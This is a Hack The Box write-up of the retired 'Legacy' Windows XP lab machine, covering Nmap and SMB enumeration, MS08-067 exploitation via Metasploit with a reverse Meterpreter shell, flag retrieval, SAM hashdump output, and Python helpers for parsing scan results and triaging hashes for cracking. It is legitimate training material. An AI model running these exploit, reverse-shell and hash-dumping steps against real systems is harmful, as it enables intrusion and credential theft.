Hack The Box Legacy Writeup

Published:
September 6, 2024

This is a writeup for the retired Hack The Box Legacy machine.

Solution Summary

Solution

There are only four steps this time:

  1. Run Nmap, scan and fingerprint services on the machine.
  2. Probe the SMB share and identify vulnerabilities.
  3. Exploit the identified vulnerability and launch Meterpreter on the machine.
  4. Extract both user and administrator flags.

Nmap

Nmap can also write its results as XML (-oX). That is handy when you want a machine-readable copy to store, diff or parse later while still reading the regular console output.

nmap -sV -sC -A -oX machines/legacy/nmap.xml 10.10.10.4
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-06 08:31 JST
Nmap scan report for 10.10.10.4
Host is up (0.18s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
135/tcp open  msrpc       Microsoft Windows RPC
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:1e:f0 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-09-11T04:19:15+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h17m33s, deviation: 2h07m16s, median: 4d22h47m33s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.49 seconds
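
Since the point of -oX is to keep a machine-readable copy, here is what consuming that copy looks like. This is an added example for this writeup, not code from the original post or from Nmap: SAMPLE_XML is a constructed, trimmed sample modelled on the Legacy scan above (the element names nmaprun/host/address/ports/port/state/service/hostscript/script/elem are the ones real -oX output uses); the function names are my own. It pulls out the open ports with their service fingerprints, the host scripts that report VULNERABLE, and whether SMB2 negotiation failed.

```python
"""Parse Nmap -oX output into a structure you can store, diff or grep.

Added example, not code from the writeup or from Nmap. SAMPLE_XML is a
constructed sample modelled on the Legacy scan; real -oX files use the
same element names.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="7.94">
  <host>
    <status state="up"/>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135">
        <state state="open"/>
        <service name="msrpc" product="Microsoft Windows RPC" ostype="Windows"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="open"/>
        <service name="netbios-ssn" product="Microsoft Windows netbios-ssn"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds" product="Windows XP microsoft-ds" ostype="Windows XP"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="closed"/>
      </port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms10-054" output="false"/>
      <script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;    State: VULNERABLE">
        <table key="CVE-2017-0143"><elem key="state">VULNERABLE</elem></table>
      </script>
      <script id="smb-vuln-ms08-067" output="&#10;  VULNERABLE:&#10;    State: VULNERABLE">
        <table key="CVE-2008-4250"><elem key="state">VULNERABLE</elem></table>
      </script>
      <script id="smb2-time" output="Protocol negotiation failed (SMB2)"/>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str) -> list[dict]:
    """One dict per host: address, open ports with service info, host scripts."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        status = host.find("status")
        entry = {
            "addr": addr.get("addr") if addr is not None else None,
            "up": status is not None and status.get("state") == "up",
            "ports": [],
            "scripts": {},
        }
        for port in host.iterfind("ports/port"):
            if port.find("state").get("state") != "open":
                continue  # only keep what is actually reachable
            svc = port.find("service")
            entry["ports"].append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
            })
        # hostscript/ only: port-level scripts would collide on id across ports
        for script in host.iterfind("hostscript/script"):
            state = script.find(".//elem[@key='state']")
            entry["scripts"][script.get("id")] = {
                "output": script.get("output", ""),
                "state": state.text if state is not None else None,
            }
        hosts.append(entry)
    return hosts


def open_ports(host: dict) -> list[int]:
    return sorted(p["port"] for p in host["ports"])


def vulnerable_scripts(host: dict) -> list[str]:
    """Ids of host scripts that flagged VULNERABLE: use the structured
    <elem key="state"> when present, fall back to the plain-text output."""
    return sorted(
        sid for sid, s in host["scripts"].items()
        if s["state"] == "VULNERABLE" or "State: VULNERABLE" in s["output"]
    )


def smb1_only(host: dict) -> bool:
    """True when SMB2 negotiation failed, i.e. the host only speaks SMBv1."""
    return "Protocol negotiation failed" in host["scripts"].get("smb2-time", {}).get("output", "")


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_XML):
        print(h["addr"], "open:", open_ports(h), "vulnerable:", vulnerable_scripts(h),
              "smb1-only:", smb1_only(h))
```

Point it at a real file with `parse_nmap_xml(open("machines/legacy/nmap.xml").read())`. The structured `<elem key="state">` is what the smb-vuln-* scripts emit through Nmap's vulns library; the text fallback covers scripts that only set the output attribute.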

Findings:

  1. Three open TCP ports in the top 1000, all Windows RPC/SMB: 135 (msrpc), 139 (netbios-ssn) and 445 (microsoft-ds).
  2. The OS fingerprint is Windows XP (NetBIOS name LEGACY, workgroup HTB), long out of support.
  3. SMB2 negotiation fails, so the host speaks SMBv1 only, and SMB message signing is disabled.
  4. Nmap's SMB scripts got in with a guest-level session (account_used: guest), so some unauthenticated enumeration works.
  5. The system clock is about five days ahead of the scanner (see clock-skew), which is why a 2024-09-06 scan shows 2024-09-11 timestamps.

Probing SMB

I am trying out NetExec here for the first time:

netexec smb 10.10.10.4
SMB         10.10.10.4      445    LEGACY           [*] Windows 5.1 x32 (name:LEGACY) (domain:legacy) (signing:False) (SMBv1:True)
netexec smb 10.10.10.4 -u guest -p '' --shares
SMB         10.10.10.4      445    LEGACY           [-] legacy\guest: STATUS_LOGON_FAILURE

It doesn’t look like we can access the SMB shares with username guest and an empty password.

The target only negotiates SMBv1 (note the "Protocol negotiation failed (SMB2)" line in the Nmap output). Modern Samba clients default to client min protocol = SMB2_02 and refuse to fall back, so smbclient needs its floor lowered, either in the [global] section of /etc/samba/smb.conf:

[global]
client min protocol = CORE
client max protocol = SMB3

or just for one invocation with --option='client min protocol=NT1'. NT1 is the SMBv1 dialect XP speaks; CORE is the oldest dialect and works as well. Lowering the floor re-enables downgrade attacks against your own client, so keep it to the lab.

With that in place the negotiation succeeds, but the guest login fails in smbclient as well:

smbclient -L //10.10.10.4 --user='guest' --workgroup="HTB"
Password for [HTB\guest]:
session setup failed: NT_STATUS_LOGON_FAILURE

Are there any other obvious things before we start brute-forcing passwords?

nmap --script 'smb-vuln*' -p 139,445 10.10.10.4
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-06 09:16 JST
Nmap scan report for 10.10.10.4
Host is up (0.17s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.91 seconds

Nmap reports two exploitable bugs: MS17-010 (EternalBlue, in the SMBv1 driver) and MS08-067 (the Server service NetAPI overflow). Both run in SYSTEM context on an unpatched XP box, so either one hands over the whole machine. It’s time to engage Metasploit.

Metasploit

In msfconsole, we search for applicable exploits:

search cve:2017-0143 type:exploit
# 3 results are found
search cve:2008-4250 type:exploit
# 1 result is found

We pick the older of the two, exploit/windows/smb/ms08_067_netapi for CVE-2008-4250:

use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.4
set LPORT 4444
set LHOST 10.10.16.2
run

Great, I don’t even know what Meterpreter is. Time to find out!

[*] Started reverse TCP handler on 10.10.16.2:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176198 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.4:1035) at 2024-09-06 09:22:16 +0900

meterpreter >

Meterpreter is Metasploit’s post-exploitation agent. It runs in memory inside the exploited process rather than as a dropped executable, and exposes a shell-like command set (ls, cat, download, upload, shell, hashdump and more) for working on the Windows box.

meterpreter > ls 'C:/Documents and Settings/Administrator'
Listing: C:/Documents and Settings/Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:29 +0900  Application Data
040777/rwxrwxrwx  0       dir   2017-03-16 14:32:27 +0900  Cookies
040777/rwxrwxrwx  0       dir   2017-03-16 15:18:27 +0900  Desktop
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:32 +0900  Favorites
040777/rwxrwxrwx  0       dir   2017-03-16 14:20:48 +0900  Local Settings
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:31 +0900  My Documents
100666/rw-rw-rw-  786432  fil   2022-05-28 19:28:03 +0900  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2024-09-11 10:31:56 +0900  NTUSER.DAT.LOG
040777/rwxrwxrwx  0       dir   2017-03-16 14:20:48 +0900  NetHood
040777/rwxrwxrwx  0       dir   2017-03-16 14:20:48 +0900  PrintHood
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:31 +0900  Recent
040555/r-xr-xr-x  0       dir   2017-03-16 15:07:24 +0900  SendTo
040555/r-xr-xr-x  0       dir   2017-03-16 14:20:48 +0900  Start Menu
040777/rwxrwxrwx  0       dir   2017-03-16 14:28:41 +0900  Templates
100666/rw-rw-rw-  178     fil   2022-05-28 19:28:03 +0900  ntuser.ini

meterpreter > ls 'C:/Documents and Settings/Administrator/Desktop'
Listing: C:/Documents and Settings/Administrator/Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 15:18:50 +0900  root.txt

meterpreter > cat 'C:/Documents and Settings/Administrator/Desktop/root.txt'
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

I guess that’s our administrator flag: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Meterpreter can even dump the SAM hashes with hashdump. That works here without any privilege escalation step because MS08-067 exploits the Server service, which runs as NT AUTHORITY\SYSTEM, so the session already has the rights needed to read the SAM.

meterpreter > hashdump
Administrator:500:b47234f31e261b47587db580d0d5f393:b1e8bd81ee9a6679befb976c0b9b6827:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:0ca071c2a387b648559a926bfe39f8d7:332e3bd65dbe0af563383faff76c6dc5:::
john:1003:dc6e5a1d0d4929c2969213afe9351474:54ee9a60735ab539438797574a9487ad:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:f2b8398cafc7174be746a74a3a7a3823:::
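
The dump is in pwdump format, user:RID:LM:NT:::, and two of the hashes are well-known constants worth recognising on sight. Below is an added example (not code from the writeup or from Metasploit) that triages such a dump: it flags blank passwords and empty LM fields, labels the built-in RIDs, and emits user:NT pairs for hashcat mode 1000. SAMPLE_DUMP is the Legacy dump quoted above. The function names are mine; the NT hash is recomputed from scratch (MD4 over UTF-16LE) rather than via hashlib, because OpenSSL 3 builds often ship without MD4.

```python
"""Triage Meterpreter hashdump (pwdump) output.

Added example, not from the writeup or Metasploit. Lines are user:RID:LM:NT:::.
SAMPLE_DUMP is the Legacy dump quoted in the writeup.
"""
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM slot when LM storage is off or pw > 14 chars
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4("") == NT hash of a blank password
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

SAMPLE_DUMP = """\
Administrator:500:b47234f31e261b47587db580d0d5f393:b1e8bd81ee9a6679befb976c0b9b6827:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:0ca071c2a387b648559a926bfe39f8d7:332e3bd65dbe0af563383faff76c6dc5:::
john:1003:dc6e5a1d0d4929c2969213afe9351474:54ee9a60735ab539438797574a9487ad:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:f2b8398cafc7174be746a74a3a7a3823:::
"""


def _md4(data: bytes) -> bytes:
    """Minimal MD4 (RFC 1320); hashlib's md4 is often missing under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = h[:]
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                r = (-i) % 4                        # register updated: a, d, c, b, a, ...
                x, y, z = s[(r + 1) % 4], s[(r + 2) % 4], s[(r + 3) % 4]
                s[r] = rotl((s[r] + fn(x, y, z) + X[j] + k) & mask, shifts[i % 4])
        h = [(a + b) & mask for a, b in zip(h, s)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password, no salt: identical passwords collide."""
    return _md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list[dict]:
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.strip().split(":")[:4]
        entries.append({
            "user": user,
            "rid": int(rid),
            "lm": lm.lower(),
            "nt": nt.lower(),
            # a real LM hash is case-insensitive DES over two 7-char halves: trivial to crack
            "lm_stored": lm.lower() != EMPTY_LM,
            "blank_password": nt.lower() == EMPTY_NT,
            "note": WELL_KNOWN_RIDS.get(int(rid), ""),
        })
    return entries


def hashcat_nt_lines(entries: list[dict]) -> list[str]:
    """user:NT lines for `hashcat -m 1000 --username`; blank passwords need no cracking."""
    return [f"{e['user']}:{e['nt']}" for e in entries if not e["blank_password"]]


if __name__ == "__main__":
    for e in parse_pwdump(SAMPLE_DUMP):
        print(f"{e['user']:<18} rid={e['rid']:<5} lm_stored={e['lm_stored']!s:<5} "
              f"blank={e['blank_password']!s:<5} {e['note']}")
```

Here Guest has both the empty LM and the blank-password NT hash, HelpAssistant and SUPPORT_388945a0 have no LM hash stored, and Administrator and john still have real LM hashes, which on XP means their passwords are at most 14 characters and crackable case-insensitively in two halves.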

The format is user:RID:LM hash:NT hash. Guest’s NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password, and aad3b435b51404eeaad3b435b51404ee in the LM column means no LM hash is stored (LM disabled or a password longer than 14 characters). Administrator and john still carry real LM hashes, which are trivially crackable. The other user on this machine is john:

meterpreter > ls 'C:/Documents and Settings/john/Desktop'
Listing: C:/Documents and Settings/john/Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 15:19:49 +0900  user.txt

meterpreter > cat 'C:/Documents and Settings/john/Desktop/user.txt'
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

The user flag is: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Totally owned yo, totally not a script kiddie


This cheat sheet here is very useful: https://0xdf.gitlab.io/2024/03/21/smb-cheat-sheet.html

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.
